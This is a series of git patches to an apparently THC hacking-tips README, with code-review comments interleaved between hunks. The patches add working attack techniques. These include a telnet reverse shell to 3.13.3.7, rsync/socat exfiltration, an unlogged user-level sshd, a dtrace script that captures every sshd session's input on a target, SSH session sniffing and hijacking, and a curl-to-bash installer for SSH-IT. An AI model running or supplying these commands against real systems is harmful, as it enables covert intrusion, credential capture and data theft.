@@ -1187,10 +1187,9 @@ mkfifo /tmp/.io; sh -i 2>&1 /tmp/.io Telnet variant when mkfifo is not supported (Ulg!): ```sh -({ touch /tmp/.fio; sleep 60; rm -f /tmp/.fio;} & ); -tail -f /tmp/.fio | sh -i 2>&1 | telnet 3.13.3.7 1524 >/tmp/.fio +touch /tmp/.fio; tail -f /tmp/.fio | sh -i | telnet 3.13.3.7 31337 >/tmp/.fio ``` -Note: This trick logs your commands to a file. The file will be *unlinked* from the after 60 seconds but remains useable as a 'make shift pipe' as long as the reverse tunnel is started within 60 seconds. +Note: Dont forget to `rm /tmp/.fio` after login. **5.i.g. Reverse shell with remote.moe and ssh (encrypted)** From 4abd6ec96ddd6a74861d869e5c7dd7649b4b21ae Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Fri, 13 Oct 2023 11:34:59 +0100 Subject: [PATCH 34/56] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index aac3248..defba75 100644 --- a/README.md +++ b/README.md @@ -432,7 +432,7 @@ tcpdump -n "tcp[tcpflags] == tcp-syn" tcpdump -nlq "tcp[13] == 2 and dst port 22" | while read x; do echo "${x}"; echo -en \\a; done ## Ascii output (for all large packets. Change to >40 if no TCP options are used). -tcpdump -s 2048 -nAq 'tcp and (ip[2:2] > 60)' +tcpdump -s0 -nAq 'tcp and (ip[2:2] > 60)' ``` From ef8f679e0e14698735e0a4a82048068f9db63477 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Fri, 13 Oct 2023 13:47:07 +0100 Subject: [PATCH 35/56] Update README.md --- README.md | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/README.md b/README.md index defba75..c7f75d3 100644 --- a/README.md +++ b/README.md 
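Review bot: in PATCH 33/56 hunk @@ -1187,10 +1187,9 @@ the rewritten line `touch /tmp/.fio; tail -f /tmp/.fio | sh -i | telnet 3.13.3.7 31337 >/tmp/.fio` changes the port from 1524 to 31337, unlike every other listener example in this section, and drops the `2>&1` the previous line had on `sh -i`, so the shell's stderr (its prompt and error messages) no longer travels back through telnet; both look accidental. The new note should read "Don't forget", and since the `sleep 60; rm -f` wrapper is gone, the removed note's point that typed commands are written to a file on disk until it is removed should survive in the new note.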
@@ -1008,19 +1008,19 @@ Receiver: ```posh openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509 -keyout ssl.key -out ssl.crt cat ssl.key ssl.crt >ssl.pem -rm -f ssl.key +rm -f ssl.key ssl.crt mkdir upload -socat OPENSSL-LISTEN:31337,reuseaddr,fork,cert=ssl.pem,cafile=ssl.crt EXEC:"rsync --server -logtprR --safe-links --partial upload" +socat OPENSSL-LISTEN:31337,reuseaddr,fork,cert=ssl.pem,cafile=ssl.pem EXEC:"rsync --server -logtprR --safe-links --partial upload" ``` Sender: ```posh -# Copy the ssl.pem and ssl.crt from the Receiver to the Sender: +# Copy the ssl.pem from the Receiver to the Sender and send directory named 'warez' # Using rsync + socat-ssl -rsync -ahPRv -e "bash -c 'socat - OPENSSL-CONNECT:1.2.3.4:31337,cert=ssl.pem,cafile=ssl.crt,verify=0' #" -- warez 0: +rsync -ahPRv -e "bash -c 'socat - OPENSSL-CONNECT:1.2.3.4:31337,cert=ssl.pem,cafile=ssl.pem,verify=0' #" -- ./warez 0: # Using rsync + openssl -rsync -ahPRv -e "bash -c 'openssl s_client -connect 1.2.3.4:31337 -servername thc -cert ssl.pem -CAfile ssl.crt -quiet 2>/dev/null' #" -- warez 0: +rsync -ahPRv -e "bash -c 'openssl s_client -connect 1.2.3.4:31337 -servername thc -cert ssl.pem -CAfile ssl.pem -quiet 2>/dev/null' #" -- ./warez 0: ``` Rsync can be combined to exfil via [https / cloudflared raw TCP tunnels](https://iq.thc.org/tunnel-via-cloudflare-to-any-tcp-service). From 6b4fd5496040f643172bd2a0053487dc427c8c6f Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Fri, 13 Oct 2023 18:52:31 +0100 Subject: [PATCH 36/56] Update README.md --- README.md | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/README.md b/README.md index c7f75d3..2dcd4b3 100644 --- a/README.md +++ b/README.md 
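Review bot: PATCH 35/56 hunk @@ -1008,19 +1008,19 @@ tells the sender to copy `ssl.pem`, but `ssl.pem` is `cat ssl.key ssl.crt`, i.e. it contains the receiver's private key, and `rm -f ssl.key ssl.crt` leaves it as the only copy; the sender then presents that same key as its client certificate (`cert=ssl.pem`), so both ends share one key pair, and with `verify=0` (socat) and no `-verify_return_error` (openssl) the sender does not check the receiver either. If a shared key pair is intended, say so in the comment; otherwise keep `ssl.crt` as the sender's `cafile`/`-CAfile` and copy only the certificate. Note also that `cafile=ssl.pem` on the `OPENSSL-LISTEN` side makes the receiver trust its own certificate as CA, which only works because the client presents exactly that file.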
@@ -1931,10 +1931,11 @@ rlwrap --always-readline ssh user@host 4. [HTB absolute](https://0xdf.gitlab.io/2023/05/27/htb-absolute.html) - Well written and explained attack. 5. [Conti Leak](https://github.com/ForbiddenProgrammer/conti-pentester-guide-leak) - Windows hacking. Pragmatic. 6. [Red Team Notes](https://www.ired.team/) -7. [HackTricks](https://book.hacktricks.xyz/welcome/readme) -8. [Awesome Red Teaming](https://github.com/yeyintminthuhtut/Awesome-Red-Teaming) -9. [VulHub](https://github.com/vulhub/vulhub) - Test your exploits -10. [Qubes-OS](https://www.qubes-os.org/) - Desktop OS focused on security with XEN isolated (disposable) guest VMs (Fedora, Debian, Whonix out of the box) +7. [InfoSec CheatSheet](https://github.com/r1cksec/cheatsheets) +8. [HackTricks](https://book.hacktricks.xyz/welcome/readme) +9. [Awesome Red Teaming](https://github.com/yeyintminthuhtut/Awesome-Red-Teaming) +10. [VulHub](https://github.com/vulhub/vulhub) - Test your exploits +11. [Qubes-OS](https://www.qubes-os.org/) - Desktop OS focused on security with XEN isolated (disposable) guest VMs (Fedora, Debian, Whonix out of the box) --- From b8ba706d18a1548235ba33aac06ca4c3e5b4f6d3 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Mon, 16 Oct 2023 15:25:58 +0100 Subject: [PATCH 37/56] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 2dcd4b3..bde54a0 100644 --- a/README.md +++ b/README.md 
@@ -619,7 +619,7 @@ nmap -A -F -Pn --min-rate 10000 --script vulners.nse --script-timeout=5s scanme. hashcat --username -w3 my-hash /usr/share/wordlists/rockyou.txt ``` -Read the [FAQ](https://hashcat.net/wiki/doku.php?id=frequently_asked_questions) or use [Crackstation](https://crackstation.net) or [ColabCat/cloud](https://github.com/someshkar/colabcat)/[Cloudtopolis](https://github.com/JoelGMSec/Cloudtopolis) or on [AWS](https://akimbocore.com/article/hashcracking-with-aws/). +Read the [FAQ](https://hashcat.net/wiki/doku.php?id=frequently_asked_questions) or use [Crackstation](https://crackstation.net), [shuck.sh](https://shuck.sh/), [ColabCat/cloud](https://github.com/someshkar/colabcat)/[Cloudtopolis](https://github.com/JoelGMSec/Cloudtopolis) or crack on your own [AWS](https://akimbocore.com/article/hashcracking-with-aws/). **3.xi. Brute Force Passwords / Keys** From acfb6fec93443ddd7813c48751bb3f89e10714c3 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Mon, 16 Oct 2023 20:56:26 +0100 Subject: [PATCH 38/56] Update README.md --- README.md | 18 ++++++++++++++++++ 1 file changed, 18 insertions(+) diff --git a/README.md b/README.md index bde54a0..a2b9842 100644 --- a/README.md +++ b/README.md @@ -24,6 +24,7 @@ Got tricks? Join us on Telegram: [https://t.me/thcorg](https://t.me/thcorg) 1. [SSH socks5 tunnel](#ssh-socks-tunnel) 1. [SSH to NATed host](#ssh-j) 1. [SSH pivot via ProxyJump](#ssh-pj) + 1. [SSHD as user](#sshd-user) 1. [Network](#network) 1. [Discover hosts](#discover) 1. [Tcpdump](#tcpdump) 
@@ -404,6 +405,23 @@ kali@local-kali$ ssh -J c2@10.25.237.119 jumpuser@192.168.5.135 > We use this as well to hide our IP address when logging into servers. + +**2.vi SSHD as user land** + +It is possible to start another SSHD on any port as non-root user and use this for connection multiplexing or forwarding (and without logging): +```sh +# On the server, as non-root user 'joe': +mkdir -p ~/.ssh 2>/dev/null +ssh-keygen -q -N "" -t ed25519 -f sshd_key +cat sshd_key.pub >>~/.ssh/authorized_keys +cat sshd_key +$(command -v sshd) -f /dev/null -o HostKey=$(pwd)/sshd_key -p 31337 # -Dvvv +``` +```sh +# On the client, copy the sshd_key from the server: +ssh -i sshd_key -p 31337 joe@1.2.3.4 +``` + --- ## 3. Network From 9f15bd008ef1f37126ec8e03e9695b06941c4757 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Mon, 16 Oct 2023 21:03:48 +0100 Subject: [PATCH 39/56] Update README.md --- README.md | 10 +++++++--- 1 file changed, 7 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index a2b9842..2b3213d 100644 --- a/README.md +++ b/README.md @@ -408,7 +408,7 @@ kali@local-kali$ ssh -J c2@10.25.237.119 jumpuser@192.168.5.135 **2.vi SSHD as user land** -It is possible to start another SSHD on any port as non-root user and use this for connection multiplexing or forwarding (and without logging): +It is possible to start a SSHD server as a non-root user and use this to multiplex or forward TCP connection (without logging and when the systemwide SSHD forbids forwarding/multiplexing): ```sh # On the server, as non-root user 'joe': mkdir -p ~/.ssh 2>/dev/null 
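Review bot: in PATCH 38/56 hunk @@ -404,6 +405,23 @@ the heading "2.vi SSHD as user land" does not match its TOC entry "SSHD as user" and lacks the trailing period of the neighbouring headings. In the code, the same `sshd_key` serves as the host key (`-o HostKey=$(pwd)/sshd_key`) and as the client's identity (`ssh -i sshd_key`), and `cat sshd_key` prints the private key to the terminal for copying; document that this collapses host and user authentication into one shared secret. With `-f /dev/null` sshd runs on its built-in defaults, which include password authentication, so if the listener is meant to accept only the key just created, say so and add `-o PasswordAuthentication=no`. The trailing `# -Dvvv` comment is never explained (foreground with debug output).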
@@ -418,10 +418,14 @@ cat sshd_key $(command -v sshd) -f /dev/null -o HostKey=$(pwd)/sshd_key -p 31337 # -Dvvv ``` ```sh -# On the client, copy the sshd_key from the server: -ssh -i sshd_key -p 31337 joe@1.2.3.4 +# On the client, copy the sshd_key from the server +# and proxy connection via the server: +ssh -D1080 -i sshd_key -p 31337 joe@1.2.3.4 +# curl -x socks5h://0 ipinfo.io ``` +[SSF](https://securesocketfunneling.github.io/ssf/#home) is an alternative way to multiplex TCP over TLS. + --- ## 3. Network From 22c694d5d0143b0850a85fc83ea42cdddc572535 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Mon, 16 Oct 2023 21:08:48 +0100 Subject: [PATCH 40/56] Update README.md --- README.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index 2b3213d..59e92c4 100644 --- a/README.md +++ b/README.md @@ -415,12 +415,12 @@ mkdir -p ~/.ssh 2>/dev/null ssh-keygen -q -N "" -t ed25519 -f sshd_key cat sshd_key.pub >>~/.ssh/authorized_keys cat sshd_key -$(command -v sshd) -f /dev/null -o HostKey=$(pwd)/sshd_key -p 31337 # -Dvvv +$(command -v sshd) -f /dev/null -o HostKey=$(pwd)/sshd_key -o GatewayPorts=yes -p 31337 # -Dvvv ``` ```sh # On the client, copy the sshd_key from the server -# and proxy connection via the server: -ssh -D1080 -i sshd_key -p 31337 joe@1.2.3.4 +# and proxy connection via the server and forward 31339 to localhsot: +ssh -D1080 -R31339:0:31339 -i sshd_key -p 31337 joe@1.2.3.4 # curl -x socks5h://0 ipinfo.io ``` From ce5801f6ed8505f2994f68aa6b693b5617ac6f3a Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Mon, 16 Oct 2023 21:10:05 +0100 Subject: [PATCH 41/56] Update README.md --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 59e92c4..7dbb930 100644 --- a/README.md +++ b/README.md 
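Review bot: the rewritten sentence in PATCH 39/56 hunk @@ -408,7 +408,7 @@ has grammar slips: "a SSHD server" should be "an SSHD server" and "forward TCP connection" should be "forward TCP connections". In the client block, `# curl -x socks5h://0 ipinfo.io` relies on SOCKS's default port matching the `-D1080` above; saying "via the SOCKS proxy on 127.0.0.1:1080" avoids surprising readers who pick another port.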
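Review bot: PATCH 40/56 hunk @@ -415,12 +415,12 @@ adds `-o GatewayPorts=yes` and `-R31339:0:31339` with a comment that only says "forward 31339 to localhsot" (typo). `GatewayPorts=yes` makes every remote-forwarded port bind on all of the server's interfaces, so 31339 becomes reachable by anyone who can reach the server, not just by local processes; the text should state this exposure, and if it is not wanted the option can stay at its default of `no` (or `clientspecified`, which lets the client choose the bind address). Spell out what `0` in `-R31339:0:31339` means (the destination host on the client side, resolved as 0.0.0.0, i.e. the client itself).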
@@ -418,8 +418,8 @@ cat sshd_key $(command -v sshd) -f /dev/null -o HostKey=$(pwd)/sshd_key -o GatewayPorts=yes -p 31337 # -Dvvv ``` ```sh -# On the client, copy the sshd_key from the server -# and proxy connection via the server and forward 31339 to localhsot: +# On the client, copy the sshd_key from the server. Then login: +# Example: Proxy connection via the server and reverse-forward 31339 to localhost: ssh -D1080 -R31339:0:31339 -i sshd_key -p 31337 joe@1.2.3.4 # curl -x socks5h://0 ipinfo.io ``` From 870214a40be6b27577d1b573e9fcdd87587fee43 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Mon, 23 Oct 2023 21:42:17 +0100 Subject: [PATCH 42/56] Update README.md --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index 7dbb930..e2834b8 100644 --- a/README.md +++ b/README.md @@ -1798,6 +1798,7 @@ Many other services (for free) Comms 1. [CryptoStorm Email](https://www.cs.email/) - Disposable emails (send & receive). (List of [Disposable-email-services](https://github.com/AnarchoTechNYC/meta/wiki/Disposable-email-services])). 1. [Temp-Mail](https://temp-mail.org/en/) - Disposable email service with great Web GUI. Receive only. +2. [tuta.io](https://tuta.io) or [ProtonMail](https://pm.me)/[.onion](https://protonmailrmez3lotccipshtkleegetolb73fuirgj7r4o4vfu7ozyd.onion/) - Free & Private email 1. [Quackr.Io](https://quackr.io/) - Disposable SMS/text messages (List of [Disposable-SMS-services](https://github.com/AnarchoTechNYC/meta/wiki/Disposable-SMS-services)). 1. [Crypton](https://crypton.sh/) - Rent a private SIM/SMS with crypto ([.onion](http://cryptonx6nsmspsnpicuihgmbbz3qvro4na35od3eht4vojdo7glm6yd.onion/)) 2. [List of "No KYC" Services](https://kycnot.me/) ([.onion](http://kycnotmezdiftahfmc34pqbpicxlnx3jbf5p7jypge7gdvduu7i6qjqd.onion/)) From 92f8c55a3dfc86df3f3454d0cb7c8e09431df841 Mon Sep 17 00:00:00 2001 
From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Sat, 28 Oct 2023 13:49:16 +0100 Subject: [PATCH 43/56] Update README.md --- README.md | 14 ++++++-------- 1 file changed, 6 insertions(+), 8 deletions(-) diff --git a/README.md b/README.md index e2834b8..9132514 100644 --- a/README.md +++ b/README.md @@ -1571,24 +1571,22 @@ Create a 256MB large encrypted file system. You will be prompted for a password. ```sh dd if=/dev/urandom of=/tmp/crypted bs=1M count=256 iflag=fullblock cryptsetup luksFormat /tmp/crypted -mkfs.ext3 /tmp/crypted +cryptsetup open /tmp/crypted sec +mkfs -t ext3 /dev/mapper/sec ``` Mount: ```sh -losetup -f -losetup /dev/loop0 /tmp/crypted -cryptsetup open /dev/loop0 crypted -mount -t ext3 /dev/mapper/crypted /mnt/crypted +cryptsetup open /tmp/crypted sec +mount -o nofail,noatime /dev/mapper/sec /mnt/sec ``` Store data in `/mnt/crypted`, then unmount: ```sh -umount /mnt/crypted -cryptsetup close crypted -losetup -d /dev/loop0 +umount /mnt/sec +cryptsetup close sec ``` **8.ii.b. Linux transportable encrypted filesystems - EncFS** From 44637987cb9cb9b8f49ec1fca460c7e37a80bff0 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Tue, 31 Oct 2023 06:25:48 +0000 Subject: [PATCH 44/56] Update README.md --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index 9132514..8f8b9bb 100644 --- a/README.md +++ b/README.md @@ -1899,6 +1899,7 @@ Telegram Channels Mindmaps & Knowledge 1. [Compass Sec Cheat Sheets](https://github.com/CompassSecurity/Hacking_Tools_Cheat_Sheet) +2. [Network Pentesting](https://github.com/wearecaster/NetworkNightmare/blob/main/NetworkNightmare_by_Caster.png) 1. [Active Directory](https://orange-cyberdefense.github.io/ocd-mindmaps/img/pentest_ad_dark_2022_11.svg) From 279feada4cca45bbdc21fc804407b1bd3c9d0a3c Mon Sep 17 00:00:00 2001 
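Review bot: PATCH 43/56 hunk @@ -1571,24 +1571,22 @@ changes the mount point to `/mnt/sec` but leaves the context line "Store data in `/mnt/crypted`" untouched; update it to `/mnt/sec`. `nofail` in `mount -o nofail,noatime` is an fstab option with no effect on a manual mount command and can be dropped. The first block runs `cryptsetup open /tmp/crypted sec` and `mkfs` but never closes the mapping, so the following "Mount" block's `cryptsetup open` fails with "already exists" if run straight after; either close the mapping after `mkfs` or note that the second `open` is only needed after a reboot. `mkdir -p /mnt/sec` is also never shown.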
From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Wed, 1 Nov 2023 15:12:47 +0000 Subject: [PATCH 45/56] dtrace --- README.md | 29 +++++++++++++++++++++++++---- 1 file changed, 25 insertions(+), 4 deletions(-) diff --git a/README.md b/README.md index 8f8b9bb..d739dcc 100644 --- a/README.md +++ b/README.md @@ -85,6 +85,7 @@ Got tricks? Join us on Telegram: [https://t.me/thcorg](https://t.me/thcorg) 1. [Encrypting a file](#encrypting-file) 1. [SSH session sniffing and hijaking](#ssh-sniffing) 1. [Sniff a user's SHELL session with script](#ssh-sniffing-script) + 2. [Sniff all SHELL sessions with dtrace](#dtrace) 1. [Sniff a user's outgoing SSH session with strace](#ssh-sniffing-strace) 1. [Sniff a user's outgoing SSH session with a wrapper script](#ssh-sniffing-wrapper) 1. [Sniff a user's outgoing SSH session with SSH-IT](#ssh-sniffing-sshit) @@ -1631,8 +1632,28 @@ echo 'exec script -qc /bin/bash ~/.ssh-log.txt' >>~/.profile ``` Consider using [zap-args](#bash-hide-arguments) to hide the the arguments and /dev/tcp/3.13.3.7/1524 as an output file to log to a remote host. + +**9.ii Sniff all SHELL sessions with dtrace** + +Especially useful for Solaris/SunOS and FreeBSD (pfSense). It uses kernel probes. + +Copy this "D Script" to the target system to a file named `d`: +```c +#pragma D option quiet +inline string NAME = "sshd"; +syscall::write:entry +/(arg0 >= 7) && (arg2 <= 16) && (execname == NAME)/ +{ printf("%d: %s\n", pid, stringof(copyin(arg1, arg2))); } +``` + +Start a dtrace and log to /tmp/.log: +```sh +### Start probe as background process (csh & bash) +(dtrace -sd >&/tmp/.log &) +``` + -**9.ii Sniff a user's outgoing SSH session with strace** +**9.iii Sniff a user's outgoing SSH session with strace** ```sh strace -e trace=read -p 2>&1 | while read x; do echo "$x" | grep '^read.*= [1-9]$' | cut -f2 -d\"; done ``` 
@@ -1640,7 +1661,7 @@ Dirty way to monitor a user who is using *ssh* to connect to another host from a -**9.iii. Sniff a user's outgoing SSH session with a wrapper script** +**9.iv. Sniff a user's outgoing SSH session with a wrapper script** Even dirtier method in case */proc/sys/kernel/yama/ptrace_scope* is set to 1 (strace will fail on already running SSH sessions) @@ -1686,7 +1707,7 @@ To uninstall cut & paste this\033[0m:\033[1;36m The SSH session will be sniffed and logged to *~/.ssh/logs/* the next time the user logs into his shell and uses SSH. -**9.iv Sniff a user's outgoing SSH session using SSH-IT** +**9.v Sniff a user's outgoing SSH session using SSH-IT** The easiest way is using [https://www.thc.org/ssh-it/](https://www.thc.org/ssh-it/). @@ -1695,7 +1716,7 @@ bash -c "$(curl -fsSL https://thc.org/ssh-it/x)" ``` -**9.v Hijak / Take-over a running SSH session** +**9.vi Hijak / Take-over a running SSH session** Use [https://github.com/nelhage/reptyr](https://github.com/nelhage/reptyr) to take over an existing SSH session: ```sh From b1787ebb76fcda1ded0a95d18f68a60816578939 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Wed, 1 Nov 2023 15:16:08 +0000 Subject: [PATCH 46/56] Update README.md --- README.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index d739dcc..1425b37 100644 --- a/README.md +++ b/README.md @@ -1635,7 +1635,7 @@ Consider using [zap-args](#bash-hide-arguments) to hide the the arguments and /d **9.ii Sniff all SHELL sessions with dtrace** -Especially useful for Solaris/SunOS and FreeBSD (pfSense). It uses kernel probes. +Especially useful for Solaris/SunOS and FreeBSD (pfSense). It uses kernel probes to trace *all* sshd processes. Copy this "D Script" to the target system to a file named `d`: ```c 
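Review bot: in PATCH 45/56 hunk @@ -1631,8 +1632,28 @@ the D script's predicate `(arg0 >= 7) && (arg2 <= 16)` is an undocumented heuristic (file descriptors 7 and up, writes of at most 16 bytes); state in the text what it is meant to select, that it misses longer writes such as pasted input, and that it may capture unrelated small writes by `sshd`. `stringof(copyin(arg1, arg2))` relies on a NUL byte following the copied data, which a write buffer does not guarantee, so output may run past the captured bytes; say so. `/tmp/.log` is created with the default umask in a world-readable directory and holds captured session input, which is worth stating for anyone reviewing the host later. Headings "9.ii" and "9.iii" drop the period that "9.iv." keeps in the same hunk, and the TOC entry is numbered `2.` among `1.` items.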
@@ -1648,8 +1648,8 @@ syscall::write:entry Start a dtrace and log to /tmp/.log: ```sh -### Start probe as background process (csh & bash) -(dtrace -sd >&/tmp/.log &) +### Start kernel probe as background process. +(dtrace -sd >/tmp/.log &) ``` From 9977cde53e6bfd84a706a41f86af12cbc5a2fda1 Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Tue, 7 Nov 2023 13:57:32 +0000 Subject: [PATCH 47/56] Update README.md --- README.md | 11 +++++++++++ 1 file changed, 11 insertions(+) diff --git a/README.md b/README.md index 1425b37..7130058 100644 --- a/README.md +++ b/README.md @@ -547,6 +547,7 @@ More: [https://github.com/twelvesec/port-forwarding](https://github.com/twelvese **3.iv. Use any tool via Socks Proxy** +### Create a tunnel from the target to your workstation using gsocket: On the target's network: ```sh ## Create a SOCKS proxy into the target's network. @@ -560,6 +561,7 @@ On your workstation: gs-netcat -p 1080 ``` +### Using ProxyChain: ```sh ## Use ProxyChain to access any host on the target's network: echo -e "[ProxyList]\nsocks5 127.0.0.1 1080" >pc.conf @@ -570,6 +572,15 @@ proxychains -f pc.conf -q nmap -n -Pn -sV -F --open 192.168.1.1 seq 1 254 | xargs -P10 -I{} proxychains -f pc.conf -q nmap -n -Pn -sV -F --open 192.168.1.{} ``` +### Using GrafTCP: +```sh +## Use graftcp to access any host on the target's network: +(graftcp-local -select_proxy_mode only_socks5 &) +graftcp curl ipinfo.io +graftcp ssh root@192.168.1.1 +graftcp nmap -n -Pn -sV -F --open 19.168.1.1 +``` + **3.v. Find your public IP address** From ad656127256c1595c32f9742e2959b463fc691ee Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Tue, 7 Nov 2023 14:40:26 +0000 Subject: [PATCH 48/56] Update README.md --- README.md | 18 ++++++++++++++++++ 1 file changed, 18 insertions(+) diff --git a/README.md b/README.md index 7130058..96d30b5 100644 --- a/README.md +++ b/README.md 
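Review bot: PATCH 46/56 hunk @@ -1648,8 +1648,8 @@ replaces `>&/tmp/.log` with `>/tmp/.log`, so dtrace's stderr (permission errors, probe-not-found and other diagnostics) now lands on the terminal instead of the log, even though the replaced comment said the form was chosen to work for both csh and bash. If the intent is a quiet background probe, keep stderr redirected (`>/tmp/.log 2>&1` in POSIX shells) or say that errors are expected on the terminal.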
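Review bot: the `###` subheadings introduced in PATCH 47/56 hunks @@ -547,6 +547,7 @@, @@ -560,6 +561,7 @@ and @@ -570,6 +572,15 @@ are the only level-3 Markdown headings nested under a bold `**3.iv.**` pseudo-heading in this README; the rest of the file subdivides with bold `**3.iii.a**`-style labels, and `###` entries will surface in any generated TOC. In the GrafTCP block, `graftcp nmap ... 19.168.1.1` is a typo for `192.168.1.1` (the two lines above use 192.168.1.1), and "ProxyChain" should be "ProxyChains", the tool's actual name. `(graftcp-local -select_proxy_mode only_socks5 &)` silently assumes a SOCKS5 proxy at graftcp-local's default address; state that it expects the gs-netcat listener on port 1080 started earlier in this section.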
@@ -444,6 +444,7 @@ NET="10.11.0" # discover 10.11.0.1-10.11.0.254 seq 1 254 | xargs -P20 -I{} ping -n -c3 -i0.2 -w1 -W200 "${NET:-192.168.0}.{}" | grep 'bytes from' | awk '{print $4" "$7;}' | sort -uV -k1,1 ``` +--- **3.ii. tcpdump** @@ -458,6 +459,7 @@ tcpdump -nlq "tcp[13] == 2 and dst port 22" | while read x; do echo "${x}"; echo tcpdump -s0 -nAq 'tcp and (ip[2:2] > 60)' ``` +--- **3.iii. Tunnel and forwarding** @@ -474,6 +476,7 @@ openssl s_client -connect smtp.gmail.com:465 socat TCP-LISTEN:25,reuseaddr,fork openssl-connect:smtp.gmail.com:465 ``` +--- **3.iii.a Raw TCP reverse ports** @@ -493,6 +496,7 @@ See also [remote.moe](#revese-shell-remote-moe) (free) to forward raw TCP from t Other free services are limited to forward HTTPS only (not raw TCP). Some tricks below show how to tunnel raw TCP over HTTPS forwards (using websockets). +--- **3.iii.b HTTPS reverse tunnels** @@ -544,6 +548,7 @@ curl -x socks5h://0 ipinfo.io More: [https://github.com/twelvesec/port-forwarding](https://github.com/twelvesec/port-forwarding) and [Tunnel via Cloudflare to any TCP Service](https://iq.thc.org/tunnel-via-cloudflare-to-any-tcp-service) and [Awesome Tunneling](https://github.com/anderspitman/awesome-tunneling). +--- **3.iv. Use any tool via Socks Proxy** @@ -581,6 +586,7 @@ graftcp ssh root@192.168.1.1 graftcp nmap -n -Pn -sV -F --open 19.168.1.1 ``` +--- **3.v. Find your public IP address** @@ -617,6 +623,7 @@ curl -x socks5h://localhost:9050 -s https://check.torproject.org/api/ip ### Result should be {"IsTor":true... ``` +--- **3.vi. Check reachability from around the world** @@ -630,6 +637,7 @@ ooniprobe list ooniprobe list 1 ``` +--- **3.vii. Check/Scan Open Ports on an IP** @@ -646,6 +654,7 @@ nmap -sCV -F -Pn --min-rate 10000 scanme.nmap.org nmap -A -F -Pn --min-rate 10000 --script vulners.nse --script-timeout=5s scanme.nmap.org ``` +--- **3.viii. Crack Password hashes** @@ -863,6 +872,7 @@ xxd -p issue.net-COPY ``` +--- ### 4.ii. File transfer - using cut & paste 
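Review bot: several of the `---` inserts in this patch land directly under a prose line rather than under a closing fence, e.g. @@ -493 (after "...HTTPS forwards (using websockets).") and @@ -544 (after the "More: ..." line). CommonMark treats `---` on the line following paragraph text as a setext heading underline, so that sentence is rendered as an H2 instead of a horizontal rule. The inserts that follow a closing fence (@@ -444, @@ -458, @@ -474, @@ -581, @@ -617, @@ -630, @@ -646, @@ -863) are harmless; every insert after prose needs a blank line before the `---`.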
@@ -873,6 +883,7 @@ cat >output.txt <<-'__EOF__' __EOF__ ### Finish your cut & paste by typing __EOF__ ``` +--- ### 4.iii. File transfer - using *screen* @@ -925,6 +936,7 @@ Get *screen* to slurp the base64 encoded data into screen's clipboard and paste Note: Two CTRL-d are required due to a [bug in openssl](https://github.com/openssl/openssl/issues/9355). +--- ### 4.iv. File transfer - using gs-netcat and sftp @@ -949,6 +961,7 @@ gs-netcat -l <"FILENAME" # Will output a SECRET used by the receiver gs-netcat >"FILENAME" # When prompted, enter the SECRET from the sender ``` +--- ### 4.v. File transfer - using HTTPs @@ -981,6 +994,7 @@ On the Sender: curl -X POST https://CF-URL-CHANGE-ME.trycloudflare.com/upload -F 'files=@myfile.txt' ``` +--- ### 4.vi. File transfer without curl @@ -997,6 +1011,7 @@ burl() { # PORT=31337 burl http://37.120.235.188/blah.tar.gz >blah.tar.gz ``` +--- ### 4.vii. File transfer using a public dump @@ -1019,6 +1034,7 @@ transfer ~/.ssh # An entire directory ``` A list of our [favorite public upload sites](#cloudexfil). +--- ### 4.viii. File transfer - using rsync @@ -1060,6 +1076,7 @@ rsync -ahPRv -e "bash -c 'openssl s_client -connect 1.2.3.4:31337 -servername th Rsync can be combined to exfil via [https / cloudflared raw TCP tunnels](https://iq.thc.org/tunnel-via-cloudflare-to-any-tcp-service). (To exfil from Windows, use the rsync.exe from the [gsocket windows package](https://github.com/hackerschoice/binary/raw/main/gsocket/bin/gs-netcat_x86_64-cygwin_full.zip)). A noisier solution is [syncthing](https://syncthing.net/). +--- ### 4.ix. File transfer - using WebDAV @@ -1097,6 +1114,7 @@ Or mount the WebDAV share on Windows (Z:/): net use * \\example-foo-bar-lights.trycloudflare.com@SSL\sources ``` +--- ### 4.x. File transfer to Telegram From 49fd2df9434fa78247e71d6e9ed751f37839d902 Mon Sep 17 00:00:00 2001 
